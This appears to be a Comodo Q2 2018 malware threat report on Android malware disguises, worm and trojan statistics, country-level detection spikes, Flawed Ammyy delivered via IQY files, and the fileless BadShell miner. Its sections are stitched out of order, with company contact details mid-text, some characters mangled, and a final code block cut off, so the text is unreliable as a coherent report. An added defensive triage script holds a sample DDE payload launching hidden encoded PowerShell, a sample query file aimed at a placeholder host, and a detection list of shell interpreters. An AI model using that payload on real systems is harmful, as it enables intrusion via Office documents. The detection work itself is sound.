Version 2: Update Google Market Flash Player Tactic FlashLight
Disguises of RedAlert
RedAlert is spread via online hacking forums. Its distinguishing feature is the ability to block incoming calls from banks. It canvasses the device in search of the following bank applications:
depostbankfinanzassistent
plmbank
aibibankandroid
The second version can block access to some websites, including Google Chrome, Google Play store, Gmail and YouTube.
4.1.9 Hero Rat. The next digital spook, Hero Rat, mostly acts on Iranian territory. It uses third-party app stores, social networks and messengers for spreading.
Version 1
CloudVPN MyIrancel Mtprotoزیـــــبانـــــویس تلگرام ھمھ کاره
Proxy دوست یاب Telegram Ton
شارژ رایگان بگیر App Master Anti Rat PlatformA فالورگیر نامحدود اینترنت رایگان
Disguises of Hero Rat
Its code is available on a Telegram hacking channel. Notably, it's sold in three options: bronze, silver and gold.
After infiltrating a victim's device, Hero Rat shows a warning like "app can't be run". But it runs in the background and starts its spying activity. It steals text messages and audio records, makes calls, detects the device location, etc. The newly infected device is controlled via Telegram bot functionality.
Hero Rat disguises itself as Bitcoin, Free Internet Connection, Get free Followers and Telegram versions for the Iranian market.
4.1.10 Sonvpay. The next malware, Sonvpay, also wears many masks, but it is more of a fraudster than a spy.
Version 1
Caculator-2018 Despacito Ringtone CaroGame2018 Wifi-Hostpot
Reccoder-Call QRCodeBar Scanner APK
Let me love you ringtone Iphone Ringtone Night light
Beauty camera-Photo editor Shape of you ringtone
Disguises of Sonvpay
Sonvpay covertly subscribes infected devices to WAP and SMS services to add extra charges to the owner's mobile bill. Once installed, this malware displays a fake notification with a "skip" option. If you click this button, the malware begins to work in the background, subscribing the user to services she did not order.
It comes to victims in the variety of disguises named above.
4.1.11 CoinHive. And the last one in our Q2 Android malware list is CoinHive. We already mentioned it earlier in the report, and here is the version for Android devices. CoinHive for Android comes in three versions, each of them updating its mining potential. It is disseminated via the counterfeit apps you see below. But one of the vectors is especially interesting.
Version-1 Netflix Hack Instagram Hack
Version-2 TSF Launcher
Version-3 Android Service PlacarTv Futebol Ao Vivo
Disguises of CoinHive
The malware is covertly propagated via... another cryptominer, named CoinMiner.
How is that possible? Let's imagine a cybercriminal who wants to infect victims with a cryptominer to utilize their resources for cryptocurrency mining. She chooses CoinMiner for that purpose, downloads it and implants it into the victims' machines. However, she is not aware that earlier another cybercriminal infected CoinMiner with CoinHive. So the first attacker is a victim too: thief robbing thief.
This story clearly illustrates the cybersecurity situation in Q2: no one can feel totally secure. Even a predator can turn prey in seconds.
4.2 Android Malware Catalogued by Month. Below you will find detailed statistics on Android-targeted malware by month.
4.2.1 April 2018
Android-targeted malware in April
4.2.2 May 2018
Android-targeted malware in May
4.2.3 June 2018
Android-targeted malware in June
5 Malware in Q2 2018: The Big Picture
Above is a visualization of malware activity that Comodo detected in Q2 2018. The graphic covers over 400 million unique malware detections in 237 countries' top-level domains (ccTLDs). This report tries to disentangle this web of malicious activity and understand each malware type individually, as well as its impact around the world.
5.1 Strategic Threat: Computer Worms. A computer worm is like a virus but typically travels autonomously, exploiting vulnerabilities in network defenses as it spreads across the Internet. A worm is usually designed as a vehicle that delivers a malicious payload to a victim computer or network. However, even worms without a payload can consume enormous bandwidth, diminish network or local system resources and possibly cause a denial of service. For this Q2 2018 Report, we place Worms in a special category called "Strategic Threat" due to their ability to travel very quickly across the Internet and compromise many computers at once.
5.1.1 Generic Worms. This section shows the world's most common computer worm detections, covering generic worm-like activity that is not tied to a specific propagation vector.
Brontok, which has been plaguing our planet for over a decade, ranked as the top computer Worm, followed by Conficker, Nimda and over 300 more.
The bubble chart shows that in Q2 2018 Russia (ru), Turkey (tr) and India (in) were the countries with the highest number of Worm infections.
And finally, this timeline shows that the sharpest worm outbreaks occurred in Turkey (mid-April) and India (mid-May), with Russian worm detections spread more evenly throughout Q2 2018.
5.1.2 Net Worms. A "Net Worm" typically infects network shares (such as a remote hard drive or server), from which it can infect every computer that accesses it from a local area network (LAN) or company intranet.
In Q2 2018, Allaple was the most common Net Worm detected; Microsoft describes it as a "multi-threaded polymorphic" worm that can perform denial-of-service (DoS) attacks against websites.
The bubble chart above shows that Germany (de) and France (fr) were the most common countries of Net Worm detection in Q2.
The timeline above shows that Poland, Germany and Armenia experienced the sharpest Net Worm outbreaks in Q2, and that French detections were spread more evenly throughout the quarter.
5.1.3 Email Worms. Email worms are nasty in that they can travel between victim computers, for example via computer exploits and autorun functionality.
This quarter, the most common Email Worm by far was Runonce.
The top four countries for Email Worm detection were Russia (ru), Germany (de), South Africa (za) and Brazil (br).
This timeline shows the primary Email Worm outbreaks during Q2 2018, with Russia experiencing rather frequent Email Worm challenges, Germany having the deepest concentration at the beginning of June, and Poland the sharpest spike toward the end of Q2.
5.1.4 p2p Worms. A peer-to-peer (p2p) network consists of interconnected nodes (or "peers") that share resources without the use of a centralized administrative system. Such networks are commonly employed to share files such as unauthorized copies of books and films, and hackers take advantage of this dynamic to disseminate malware.
Polip was the most common p2p Worm in Q2 2018. Microsoft describes Polip as a "memory resident" virus that infects "exe" and "scr" files and may leverage the Gnutella p2p network protocol to distribute copies of itself.
The bubble chart above clearly shows Russia as the primary home to p2p Worms in Q2 2018.
And this timeline shows that Russia did not suffer from just one p2p Worm outbreak, but many.
5.1.5 IM Worms. Did you know that social media accounts can be used to spread malware? One special type of computer worm, known as an "IM" or instant messaging worm, can be used to send malicious links via sites such as Facebook, either manually or automatically.
During Q2 2018, most of the IM Worms that Comodo detected were in Iran, as illustrated in the bubble chart below.
This particular IM Worm was a variant of a famous IM Worm called Yahos, which led to the arrest of 10 people in 2012 by the FBI for spreading banking malware via social networks with the Yahos IM Worm.
This timeline shows that while Comodo did not detect many IM Worms, they were nonetheless detected throughout Q2 2018 in various corners of the globe, mostly in developing countries.
5.2 High Threat Malware
In this section we cover four high-threat malware types: Backdoors, Viruses, Trojans and Exploits. In contrast to Worms, these malware types can be considered a more localized threat, as they typically require some level of user interaction for propagation and installation. However, once they are installed on a system or network, they can be devastating to personal or enterprise security.
5.2.1 Backdoors. A backdoor is a hidden way to bypass normal user authentication, often leveraged to gain covert remote access to a computer system, cryptosystem or algorithm. A backdoor can be an installed program or a modification to an existing legitimate program.
The most common Backdoor that Comodo detected in Q2 2018 was Dark Komet (or Comet), a remote access trojan (RAT) that is fully 10 years old. This malware allows a hacker to control a compromised system with the aid of a Graphical User Interface (GUI) and can be used for almost any purpose, including various kinds of cyber espionage.
The United Kingdom ("gb" for Great Britain) was home to an astonishingly high proportion of Comodo Backdoor detections in Q2.
The UK's Backdoor challenges are also apparent in this timeline. Expect a closer analysis of this British Backdoor epidemic at Black Hat 2018.
5.2.2 Viruses. A computer virus is self-replicating code that "infects" other computer programs and devices by corrupting them in malicious ways that can facilitate data theft, spam dissemination, data destruction and more. A virus usually cannot be transferred to another computer unless a user moves the infected file or performs some action, such as opening an attachment or clicking on a hyperlink.
Ramnit was the top Virus for Q2 2018. Microsoft describes Ramnit as a "severe" virus that infects Windows executable files (EXE) and HTML files and spreads through infected removable drives such as USB flash drives.
The bubble chart above shows that Ukraine (ua) and Russia (ru) were the most common countries of detection for viruses, but also that many other countries were affected, especially developing countries.
This timeline shows that Ukraine experienced two significant Virus spikes, in mid-April and mid-May.
5.2.3 Trojans. Trojans take their name from the famous wooden horse of Greek mythology, due to malicious functionality that is hidden within seemingly useful or benign computer programs. Typically, Trojans grant remote attackers the same rights and privileges as a local user and can be used for many different kinds of cyberattack, including the installation and execution of ransomware.
In Q2 2018, Starter was the most common trojan, infecting systems in well over 100 countries. Microsoft reports that Starter creates an unauthorized user account on a victim system and adds the account to the administrator group as a "Remote Service Account".
The bubble chart shows that Germany (de) was the #1 country for Trojans, according to Comodo detections.
And this timeline shows when this huge Trojan infestation took place: at the beginning of June 2018.
5.2.4 Exploits. Computer Exploits comprise software, data chunks or sequences of commands that take advantage of pre-existing bugs or vulnerabilities in software to circumvent access controls and potentially damage target computer software or hardware. Exploits can enable unauthorized access, privilege escalation or denial of service (DoS).
The discovery of computer exploits can be rare, as such vulnerabilities are typically patched and fixed quickly once they are discovered.
In Q2 2018, the majority of exploits detected by Comodo were focused on taking advantage of a favorite hacker target: Adobe Portable Document Format (PDF) files, which were created in the 1990s to present documents in a common format independent of application software, hardware and operating systems.
Japan and India were the two countries where Comodo detected the majority of Exploit behavior in Q2 2018, with Japan clearly experiencing the most persistent challenges.
5.3 Medium Threat Malware. In this section we will focus on five malware types that are somewhat rarer and more exotic. These include Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructors. Constructors are applications that can be used to automatically create malware files.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
And this timeline shows not only that Germany had a serious problem with Constructors in Q2, but also that the malware is likely a persistent threat to German networks.
5.3.2 Packers. Malware that is "packed" refers to any means used to hide or obfuscate malicious executable code by compressing or "packing" it within larger, seemingly innocuous software and data streams. The hostile code can even come in the form of scripts. The compressed data often contains separate decompression code, or even a self-extracting archive, which is used to recreate the original code from the compressed code and then execute the malware. Encryption may also be used to conceal the malware from security software, as another means to obfuscate the attack.
MUPX, or the Modified "Ultimate Packer for Executables", dominated this part of the malware landscape. MUPX is free open source software that is compatible with numerous file formats and different operating systems, and leverages an open source data compression algorithm, UCL, that is just a few hundred bytes of code in length.
In Q2 2018, Russia was the #1 home to malware Packers.
This timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
5.3.3 Email Flooders. Email Flooders are malware used to overwhelm email servers with messages in order to "kill" them or shut them down, in a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
And this timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools. Virtual Tools are programs that can modify or alter malicious files to avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
This timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes. "Joke" malware is in fact just what it says: non-malicious applications which claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically only labeled a "Medium" threat because the hacker's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
In this timeline you can see that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications. In this section we will cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications. Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. However, Comodo detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018, the most common such application was Elex. Despite the fact that Microsoft has labeled Elex only as a "Potentially Unwanted Application" or PUA, this software is nasty and attempts to install files that run at startup, add drivers, inject processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
And finally, this timeline shows that, far from being a rare occurrence, such malicious software is endemic, especially in North America.
5.4.2 Unwanted Applications. The unwanted application malware category is alarming in that, during the course of common computer and Internet activity, users often inadvertently install these Applications. For example, they include common adware programs, widely disseminated images, videos, dialers, jokes, gossip and more.
The most common unwanted application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user homepage, modify the search provider and/or perform other actions users might not have intended. They include free toolbars, adware and "system optimizers".
As you can see in the bubble chart, the US is far and away the most common country of detection for unwanted applications in Q2 2018.
And as this timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications. Unsafe applications are seemingly legitimate programs, but in fact are frequently leveraged by coders and hackers with malicious intent. Often they claim to help users with administrative or security functionality but in fact do the opposite; they include fake anti-virus and free Internet Relay Chat (IRC) clients.
The most common unsafe application that Comodo detected in Q2 2018 was AutoKMS, software that can be used to "crack" or patch unregistered copies of Microsoft software. These are referred to as "hacktools" and may be distributed with additional malware that users can install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) are #2 and #3 respectively.
This timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis. In this section, let's examine unique malware profiles that Comodo identified within specific "verticals" or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. Further, the diagram lists the #1 malware family for each Vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detected not only in one but within multiple verticals, clearly making them a current strategic threat across the world.
First, Kryptik: the New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "Clicker" to boost the hit-count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", which is another name for the "Zeus" Trojan, undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information, such as account numbers and passwords, via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social engineering scheme that falsely claims that a target's computer already has a Virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Second, strategic analysis like this can be used to create unique malware profiles for each vertical and provide valuable cyber intelligence that clarifies primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA. This timeline displays a range of the most dangerous malware types detected within the United States in Spring 2018. Clearly, the major spike on March 13 stands out in this data. What happened on this day in the US, and what might help to explain the surge in malware activity? On that day, US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for this dramatic rise in malware detections is that intelligence agencies from around the world suddenly received a raft of new intelligence collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, after which these agencies immediately began to fulfill these requirements via computer hacking (commonly called cyber espionage), which today takes place on a far greater scale than the public realizes.
7.2 China. This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. Clearly, June 4 stands out as the single most prominent day. The reason for this massive spike is that many intelligence services, both foreign and domestic, were likely busy trying to protect and/or collect sensitive information relating to current events within China. Why on June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect the kind of information that serves as the basis for intelligence reporting. This graph shows Comodo trojan horse malware detections in South Korea during Q2 2018. The highest single spikes took place simultaneously with the annual joint US-South Korean military exercises. This fact should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo malware detections in North Korea during Q2 2018. At the beginning of May, Comodo saw a spike consisting of well over ten times the usual number of detections. One plausible explanation for this activity is that someone or some institution was either briefly more connected to the Internet than usual, or was trying to take advantage of this short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
75 Armenia
All major geopolitical events today are bathed in malware The reason is that all activities ndash from social activities to business politics or national security affairs ndash are mostly performed online This is especially true during times of national crisis as both government and citizen are in overdrive trying to gather new information ndash or trying to prevent others from doing the same Ample evidence is provided by this timeline which shows that Armeniarsquos 2018 political revolution was accompanied by Comodorsquos largest detection of malware within that country during Q2 2018
7.6 Belarus

A common hacker refrain is that "information wants to be free". This timeline, which shows Comodo's virus and trojan detections in Belarus in Q2 2018, lends support to that argument. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then leveraged for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq

Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. At the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine

Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo malware detections in Ukraine in Q2 2018, the highest spike, on May 24, may have had more than one cause. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day and Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia

Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, this massive spike in malware detections in Croatia on March 28 is interesting: it came a mere day after the Russian government called a Croatian government decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA

Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland showed that it took place almost exclusively in Vantaa, a suburb of Helsinki, precisely where the summit was scheduled to take place.
8 Conclusions

In Q2, Comodo Cybersecurity observed several significant new trends that are likely to influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.

The rise of trojan malware in the last quarter means that the spread of malware in general will be amplified soon. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact to be revealed in quarters to come. Trojans also serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in host infections worldwide with a diversity of malware samples.

Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell in attacks are clear evidence of this uptick in sophistication.

Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets hold a variety of valuable information but lack protection comparable to that on desktop systems, presaging new attacks and new mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful compromise, perpetrators profit by stealing money, selling confidential information or blackmailing victims.

Moreover, given that the majority of trojans detected in Q2 were information stealers, another dangerous tendency is visible: the accelerating bias of cybercriminals toward hunting for confidential data.

Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.
North America: Comodo Security Solutions Inc, 1255 Broad Street, Clifton NJ 07013, United States. Tel +1 (888) 551 1531, +1 (888) 266 6361; Int +1 (703) 581 6361; Fax +1 (973) 777 4394; sales@comodo.com
Europe: Comodo Security Solutions Inc, Șoseaua Națională 31, Iași 700237, Romania. Tel +40 332 806 772
Asia: Comodo Security Solutions Pvt Ltd, Prestige Office Centre, 183 NSK Salai, Vadapalani, Chennai, India. Tel +91 44 4562 2800; www.comodo.co.in
About Comodo Cybersecurity

Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown", potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day. The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.

Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
After that, Emotet begins its real mission: stealing private data from the compromised system, which it then sends to the cybercriminals' Command & Control server.

The next example is even more cunning, because it infects computers through popular, legitimate Microsoft software.
2.3 Flawed Ammyy RAT attack based on legitimate software

The Flawed Ammyy trojan has a long and varied history of use in cyberattacks. What is most striking is that it is based on legitimate software, Ammyy Admin. Its history is a clear example of how malicious hackers turn a legitimate tool into a thief's tool.

Ammyy Admin is remote desktop software created by the Ammyy Group. It provides an easy way to establish a reliable remote desktop connection, connecting remote computers within seconds without additional installation or configuration work.

The dark side of this tool is that its features ideally suit the purposes of cybercriminals, and unsurprisingly they adopted it for malicious activity. Cybercriminals repeatedly compromised the Ammyy Group website and replaced the original Ammyy Admin installer with a bundle containing malware, so every user who downloaded Ammyy Admin was covertly infected. Ammyy Group cleaned up the compromised website, but the attackers infected it again, and this vicious cycle repeated itself again and again.
As the diagram shows, Ammyy Admin was used to spread many types of nefarious malware.

The newest malicious modification of Ammyy Admin is called Flawed Ammyy. It is a remote access trojan (RAT) that appeared in the wild at the beginning of 2016 and got its name from the leaked source code of Ammyy Admin version 3. Flawed Ammyy gives attackers functions such as remote desktop control, a file system manager, proxy support and audio chat. Cybercriminals take total control of the infected host and can run amok: steal credentials and documents, remove or add files, run applications, install other malware, and so on.

The way Flawed Ammyy was spread in the second quarter deserves special attention, because it used a new trick to infect users. What is especially worth noticing is that this trick, too, relies on legitimate software, this time from Microsoft.
Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.

The phishing email

IQY files are Excel Web Query files: plain-text files that tell MS Excel to fetch data from a URL, so an IQY contains a URL and a few related parameters. When the user opens the attachment, Excel retrieves whatever the URL returns and loads it into the worksheet, including any formulas, so the attacker controls what ends up in the spreadsheet and what Excel is asked to evaluate (after the user accepts Excel's security prompts).

The malicious IQY contained an attacker-controlled URL, and opening it set off a chain of malicious downloads that ended with Flawed Ammyy being downloaded and run via Windows PowerShell.

Malware runs PowerShell
Thus, in this case, machines face extremely dangerous and potent malware created from, and delivered via, legitimate software. This makes it much harder for antivirus software to detect the attack: Excel, PowerShell and the Ammyy Admin code are all legitimate components, so detection has to rest on the behaviour of the chain (an Office process fetching a URL and then spawning PowerShell) rather than on any one file.
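As an added example (not Comodo's code and not from the campaign itself), here is a small Python triage helper for this delivery chain. It parses the plain-text IQY format (a WEB header line, a format version, then the URL and optional key=value parameters), flags a query whose host is outside an allowlist or uses plain HTTP, and inspects what the URL returns for the shape these chains usually take, a formula cell that starts an external program such as PowerShell. The sample file, the allowlist, the host names and the fetched content are all constructed for the example.

```python
"""Triage an Excel Web Query (.iqy) attachment and the content its URL serves.

Added example, not part of the Comodo report. The IQY layout used here
(line 1 "WEB", line 2 format version, line 3 URL, then optional key=value
lines) is Excel's documented format; the sample file and response below are
constructed, and every host name is a placeholder.
"""
import re
from typing import Dict, List, Set
from urllib.parse import urlparse

# What Excel would do with the response: a cell whose text starts with "="
# is a formula, "=cmd|..." is a DDE launch of an external program, and the
# program names are the interpreters such chains hand off to.
FORMULA_CELL = re.compile(r"^\s*=")
DDE_LAUNCH = re.compile(r"=\s*\w+\s*\|")
SHELL_INTERPRETER = re.compile(r"powershell|\bcmd(?:\.exe)?\b|mshta|certutil|regsvr32", re.I)
IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_iqy(text: str) -> Dict[str, object]:
    """Split an IQY file into its version, URL and parameters."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel Web Query file")
    params: Dict[str, str] = {}
    for extra in lines[3:]:
        key, _, value = extra.partition("=")
        params[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "params": params}


def assess_iqy(text: str, trusted_hosts: Set[str]) -> Dict[str, object]:
    """Return the parsed query plus findings about where it will make Excel go."""
    query = parse_iqy(text)
    target = urlparse(str(query["url"]))
    host = (target.hostname or "").lower()
    findings: List[str] = []
    if target.scheme.lower() != "https":
        findings.append("plain_http")
    if host not in trusted_hosts:
        findings.append("external_host")
    if IPV4.match(host):
        findings.append("ip_literal_host")
    query["findings"] = findings
    return query


def assess_fetched_content(body: str) -> List[str]:
    """Why the text an IQY URL returns would be dangerous once Excel loads it."""
    reasons: List[str] = []
    if FORMULA_CELL.match(body):
        reasons.append("formula_cell")
    if DDE_LAUNCH.search(body):
        reasons.append("dde_launch")
    if SHELL_INTERPRETER.search(body):
        reasons.append("shell_interpreter")
    return reasons


# Constructed sample attachment and the (constructed) text its URL serves.
SAMPLE_IQY = "WEB\n1\nhttp://invoice-host.example/1.dat\n\nSelection=AllTables\nFormatting=None\n"
SAMPLE_RESPONSE = "=cmd|' /c powershell -w hidden -enc QQBBAEEA'!A0"
TRUSTED_HOSTS = {"intranet.corp.example"}

if __name__ == "__main__":
    result = assess_iqy(SAMPLE_IQY, TRUSTED_HOSTS)
    print(result["url"], result["findings"])
    print(assess_fetched_content(SAMPLE_RESPONSE))
```

The same two checks map onto a mail gateway rule (quarantine .iqy attachments whose URL is not on the allowlist) and onto sandbox output (fetch the URL and run the response through assess_fetched_content before deciding whether the attachment is benign).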
2.4 The growth of Flawed Ammyy attacks for Q2

Chart: the growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2

Map: Ammyy Admin dissemination around the world for Q2

As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably shift attack vectors toward covert theft and the manipulation of users: a real gift for cybercriminals and a nightmare for users.
Trojans let attackers gain time. Because the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage. In many cases the attack is discovered only when it is too late, after money has been withdrawn from a bank account or confidential data has been published. The pairing of trojans as payloads with phishing emails as the means of delivery, observed throughout Q2, will produce a surge in such attacks and victims. And using legitimate tools like PowerShell to run malware will amplify the number of victims even more, because such attacks are much harder for antivirus products to detect.

To fight these attacks, cybersecurity departments need to rearrange their security measures in line with the trends above. Combining the best malware detection tools with data-protection methods built on defense-in-depth principles is the most promising approach. For the chains described in this section that means, concretely: filtering or sandboxing IQY and other Office attachments at the mail gateway, applying Microsoft's controls for disabling DDE in Excel (ADV170021), turning on PowerShell script block and module logging, and alerting when an Office process spawns PowerShell.
Chart data (2.4), Flawed Ammyy detections per month in Q2 2018, as read from the chart: April 43,188; May 46,382; June 48,881.
3 Cryptominer Evolution

Going Fileless, Killing Competitors, Crashing Systems

Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behaviour recalls an army preparing for battle: training and re-equipping to fight more efficiently. Cryptominers are developing quickly and gaining dangerous new abilities.

Earlier cryptominers were only able to use an infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason many users did not regard them as particularly dangerous: they did not steal information or destroy data like other malware, they merely consumed CPU resources. Moreover, they typically did not employ strong obfuscation and could be discovered and deleted easily.

But Q2 events clearly showed that the situation has radically changed.

New cryptominer samples detected by Comodo malware analysts exhibit far more harmful abilities than mining alone requires. These samples show cryptominers transforming into a sophisticated, multifunctional weapon for cybercriminals. They are learning to hide and to fight antimalware tools: they can camouflage themselves, kill competing cryptominers and even crash the user's system when an attempt is made to remove them.
3.1 BadShell attacks enterprises

Fileless malware is next-generation malware, especially compared with traditional infection via .exe files. File-based malware resides on disk, which makes it easier to detect. Fileless malware is different: as the name suggests, it is malicious code injected into legitimate OS processes. It need not be installed on the victim machine as a file but operates only in memory, which makes it much harder for antivirus products to detect.

Such malware is usually spread via malicious ad banners. Clicking a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. Because many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.

Last quarter, Comodo Threat Research Labs analysts faced exactly such an attack. A company with several thousand endpoints was compromised by fileless malware. When its legacy security software failed to protect it, the company turned to Comodo Threat Research Labs for assistance.
Comodo analysts found that the malware was a cryptominer that used legitimate Windows components: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. The screenshots below show exactly how the malware, dubbed BadShell, works. Because the persistence lives in the task's action, enumerating task actions host-wide (for example Get-ScheduledTask | Select-Object -ExpandProperty Actions) and looking for powershell.exe launched with an encoded command is the quickest first check.

Decoding the PowerShell arguments reveals the malicious code stored in the registry. The PowerShell script injects that code into an existing running process.

BadShell at work
The malicious code in the registry
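The analyst step shown above (decode the PowerShell arguments the task runs, then look at what the decoded script touches) can be automated. The following Python is an added example, not Comodo's tooling and not BadShell's own code: it extracts the -EncodedCommand blob from a scheduled task's command line, reverses the Base64-of-UTF-16LE encoding PowerShell uses, and scores the plaintext for the traits seen in this case (registry-resident payload, Base64 decoding, in-memory loading, hidden window). The task command line and the script inside it are constructed for the example, and the registry path in it is a placeholder, not an indicator from the incident.

```python
"""Decode and triage a PowerShell -EncodedCommand launched from a scheduled task.

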